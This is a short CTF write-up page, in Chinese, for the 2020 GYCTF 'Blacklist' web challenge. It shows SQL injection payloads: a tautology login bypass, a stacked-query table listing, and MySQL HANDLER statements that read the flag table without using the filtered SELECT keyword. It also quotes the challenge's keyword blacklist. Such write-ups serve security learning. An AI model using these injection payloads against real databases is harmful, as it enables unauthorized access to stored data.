C
C
CTF-WriteUp
Search
⌃K
😅
Introduction
🥵
Friend
2015
2015 RCTF
2016
2016 0CTF
2018
2018 网鼎杯
2018 BUUCTF
2018 WesternCTF
2018 SWPUCTF
2018 HCTF
2018 SUCTF
2019
2019 AuroraCTF
2019 Hackergame
2019 RoarCTF
2019 极客大挑战
2019 SUCTF
2019 ZJCTF
2019 CISCN
2019 强网杯
2019 GXYCTF
2019 安洵杯
2019 De1CTF
2019 ASIS
2019 GWCTF
2019 PwnThyBytes
2019 BSidesCF
2019 FBCTF
2019 CSCCTF
2019 HarekazeCTF
2019 SWPU
2019 RootersCTF
2019 NCTF
2020
2020 CTFShow 36D杯
2020 GKCTF
2020 CISCN
2020 羊城杯
2020 ACTF
2020 CTFShow 月饼杯
2020 西湖论剑
2020 CTFShow 1024杯
2020 太湖杯
2020 ByteCTF
2020 BJDCTF
2020 网鼎杯
2020 MRCTF
2020 GYCTF
Blacklist
FlaskApp
Ezsqli
2020 BJDCTF
2020 WUSTCTF
2020 NPUCTF
2020 Zer0pts
2020 HFCTF
2021
2021 CTFShow DJBCTF
2021 CISCN
2021 强网杯
2021 羊城杯
2021 红明谷
2022
2022 RealWorld CTF 4th
2022 强网杯
2022 NewStarCTF
2023
HGAME
靶场
攻防世界
CTFHub
CTFShow
N1BOOK
Upload-Labs
SQL-Labs
Powered By GitBook

Blacklist

万能钥匙穿了
1' or '1'='1'#
上select被过滤了
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
感觉很像强网杯的随便注(看了一下就是),然后就是堆叠注入了。
1';show tables;#
​官方文档。使用OPEN打开表的会话,在CLOSE前不会关闭;使其在打开期间使用READ读取文件。
1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;
#
2020 - Previous
2020 GYCTF
Next
FlaskApp
Last modified 8mo ago
Copy link